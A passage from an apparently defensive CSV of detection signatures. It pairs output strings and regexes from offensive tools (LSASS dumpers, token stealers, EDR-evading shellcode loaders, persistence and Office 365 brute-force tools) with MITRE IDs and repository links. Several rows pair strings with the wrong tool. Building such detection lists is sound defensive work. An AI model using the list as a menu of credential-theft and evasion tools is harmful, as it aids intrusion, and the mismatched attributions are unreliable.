gPCFileSysPath attribute*",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sGPC\sgPCFileSysPath\sattribute.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 
- T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[+] Successfully spoofed gPLink for OU *",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sgPLink\sfor\sOU\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully updated extension names of fakedc GPO*",".{0,1000}\[\+\]\sSuccessfully\supdated\sextension\snames\sof\sfakedc\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Successfully uploaded GPO to SMB server *",".{0,1000}\[\+\]\sSuccessfully\suploaded\sGPO\sto\sSMB\sserver\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*[+] Sucessfully Dumped Process!*",".{0,1000}\[\+\]\sSucessfully\sDumped\sProcess!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[+] Suitable Handle to LSASS Found from PID: *",".{0,1000}\[\+\]\sSuitable\sHandle\sto\sLSASS\sFound\sfrom\sPID\:\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] task has been created successfully 
..!*",".{0,1000}\[\+\]\stask\shas\sbeen\screated\ssuccessfully\s\s\.\.!.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*[+] The 1$a$$.exe*",".{0,1000}\[\+\]\sThe\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*[+] The DLL has been injected into ngentask.exe via DLL Side-Loading*",".{0,1000}\[\+\]\sThe\sDLL\shas\sbeen\sinjected\sinto\sngentask\.exe\svia\sDLL\sSide\-Loading.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","N/A","10","2","103","24","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z" "*[+] The encrypted payload with *",".{0,1000}\[\+\]\sThe\sencrypted\spayload\swith\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] The scheduled task is hidden and invisible now*",".{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red 
team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Token-Impersonation Loaded*",".{0,1000}\[\+\]\sToken\-Impersonation\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Triggering name pipe access on evil PIPE *",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Unhooking the NTDLL for Process with PID *",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfor\sProcess\swith\sPID\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Unhooking the NTDLL from PID * completed successfully.*",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfrom\sPID\s.{0,1000}\scompleted\ssuccessfully\..{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*",".{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*[+] Use -info to get stack status and the enpoint url of catspin*",".{0,1000}\[\+\]\sUse\s\-info\sto\sget\sstack\sstatus\sand\sthe\senpoint\surl\sof\scatspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. 
It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*[+] User hash stolen!*",".{0,1000}\[\+\]\sUser\shash\sstolen!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the 
post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - 
self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using 
Obfuscator-LLVM to compile stub*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using username enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\susername\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Using WMI to set WMI SD*",".{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET 
library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*[+] v1.0 @decoder_it 2023*",".{0,1000}\[\+\]\sv1\.0\s\@decoder_it\s2023.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*[+] Valid login* user must enroll in MFA.*",".{0,1000}\[\+\]\sValid\slogin.{0,1000}\suser\smust\senroll\sin\sMFA\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*[+] Valid shellcode execution methods are: PoolPartyModuleStomping*",".{0,1000}\[\+\]\sValid\sshellcode\sexecution\smethods\sare\:\sPoolPartyModuleStomping.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Victim * have office365 Licence!*",".{0,1000}\[\+\]\sVictim\s.{0,1000}\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*[+] WmiExec *",".{0,1000}\[\+\]\sWmiExec\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*[+] You spin my gato round right round ?*",".{0,1000}\[\+\]\sYou\sspin\smy\sgato\sround\sright\sround\s\?.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "*[+] Your payload must be executed now !*",".{0,1000}\[\+\]\sYour\spayload\smust\sbe\sexecuted\snow\s!.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*[+]ImpersonateLoggedOnUser() succeed!*",".{0,1000}\[\+\]ImpersonateLoggedOnUser\(\)\ssucceed!.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*[=] Dumping LSASS memory*",".{0,1000}\[\=\]\sDumping\sLSASS\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[->] sending payload..as chuncks*",".{0,1000}\[\-\>\]\ssending\spayload\.\.as\schuncks.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*[bruteforce_mode]*",".{0,1000}\[bruteforce_mode\].{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*[CamHacker]*",".{0,1000}\[CamHacker\].{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*[D3m0niz3d]~#*",".{0,1000}\[D3m0niz3d\]\~\#.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*[i] [HELL HALL] Press To Run ... *",".{0,1000}\[i\]\s\[HELL\sHALL\]\sPress\s\\sTo\sRun\s\.\.\.\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[i] AAD Join:*enumerate*",".{0,1000}\[i\]\sAAD\sJoin\:.{0,1000}enumerate.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim 